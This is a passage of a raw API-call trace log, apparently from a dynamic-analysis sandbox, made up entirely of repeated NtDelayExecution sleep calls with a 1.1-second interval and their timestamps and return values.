(Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0133.553] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0133.555] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0133.558] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0133.560] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0133.562] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0133.564] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0133.565] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0133.567] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0133.568] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0133.570] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0133.571] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0133.573] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0133.575] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0133.576] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0133.577] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0133.581] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0133.583] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0133.584] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0133.586] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0133.587] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0133.589] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0133.590] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0133.592] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0133.593] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0133.595] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0133.596] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0133.598] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0133.601] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0133.602] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0133.606] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0133.608] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0133.609] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0133.611] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0133.612] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0133.614] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0133.616] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0133.617] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0133.619] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0133.620] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0133.622] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0133.623] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0133.625] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0133.626] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0133.628] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0133.631] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0133.632] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0133.634] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0133.635] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0133.637] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0133.638] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0133.640] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0133.641] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0133.643] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0133.644] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0133.646] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0133.647] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0133.649] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0133.651] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0133.665] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0133.669] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0133.671] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0133.674] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0133.675] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0133.677] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0133.678] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0133.698] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0133.700] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0133.701] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0133.703] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0133.704] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0133.706] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0133.707] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0133.709] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0133.713] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0133.714] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0133.716] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0133.717] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0133.719] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0133.720] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0133.722] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0133.723] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0133.725] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0133.726] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0133.728] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0133.729] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0133.731] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0133.732] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0133.734] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0133.735] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0133.737] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0133.742] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0133.743] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0133.745] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0133.746] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0133.748] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0133.750] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0133.752] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0133.753] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0133.755] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0133.756] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0133.758] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0133.760] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0133.761] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0133.763] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0133.764] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0133.766] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0133.767] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0133.772] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0133.773] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0133.775] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0133.776] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0133.778] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0133.779] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0133.781] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0133.782] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0133.784] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0133.792] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0133.793] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0133.795] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0133.796] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0133.798] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0133.804] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0133.806] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0133.807] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0133.809] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0133.812] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0133.814] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0133.816] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0133.817] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0133.819] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0133.820] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0133.822] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0133.823] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0133.825] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0133.826] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0133.828] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0133.829] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0133.831] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0133.835] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0133.836] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0133.838] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0133.839] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0133.841] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0133.842] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0133.844] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0133.845] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0133.847] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0133.848] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0133.850] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0133.851] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0133.853] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0133.854] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0133.856] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0133.857] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0133.859] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0133.860] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0133.862] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0133.863] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0133.868] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0133.870] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0133.871] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0133.873] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0133.879] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0133.880] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0133.882] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0133.884] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0133.886] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0133.887] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0133.889] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0133.890] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0133.892] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0133.893] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0133.895] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0133.896] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0133.898] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0133.903] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0133.905] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0133.907] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0133.908] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0133.909] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0133.911] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0133.912] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0133.914] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0133.915] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0133.917] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0133.919] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0133.921] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0133.922] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0133.924] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0133.925] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0133.927] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0133.942] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0133.944] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0133.945] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0133.947] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0133.948] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0133.950] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0133.952] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0133.953] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0133.955] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0133.956] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0133.958] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0133.959] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0133.961] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0133.962] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0133.964] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0133.965] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0133.967] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0133.968] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0133.980] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0133.982] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0133.984] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0133.985] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0133.986] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0133.988] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0133.989] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0133.991] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0133.992] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0133.994] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0133.996] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0133.997] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0133.998] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0134.000] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0134.001] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0134.003] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0134.004] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0134.006] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0134.010] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0134.011] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0134.013] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0134.014] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0134.016] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0134.017] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0134.019] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0134.020] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0134.022] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0134.023] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0134.025] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0134.026] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0134.028] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0134.029] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0134.031] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0134.032] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0134.034] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0134.035] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0134.037] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0134.038] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0134.040] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0134.041] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0134.043] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0134.048] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0134.049] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0134.051] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0134.052] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0134.054] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0134.055] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0134.057] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0134.058] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0134.060] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0134.061] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0134.063] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0134.064] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0134.066] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0134.067] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0134.069] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0134.070] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0134.072] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0134.073] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0134.075] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0134.076] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0134.078] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0134.079] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0134.081] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0134.082] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0134.087] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0134.089] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0134.090] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0134.092] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0134.093] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0134.095] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0134.096] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0134.098] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0134.099] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0134.101] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0134.103] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0134.104] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0134.105] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0134.107] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0134.108] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0134.110] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0134.112] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0134.113] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0134.114] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0134.116] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0134.117] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0134.119] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0134.120] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0134.122] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0134.128] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0134.129] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0134.130] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0134.132] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0134.133] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0134.135] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0134.136] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0134.138] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0134.139] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0134.141] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0134.142] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0134.144] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0134.145] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0134.147] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0134.148] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0134.151] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0134.152] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0134.153] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0134.155] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0134.157] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0134.158] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0134.159] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0134.161] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0134.162] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0134.164] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0134.170] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0134.171] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0134.173] NtDelayExecution 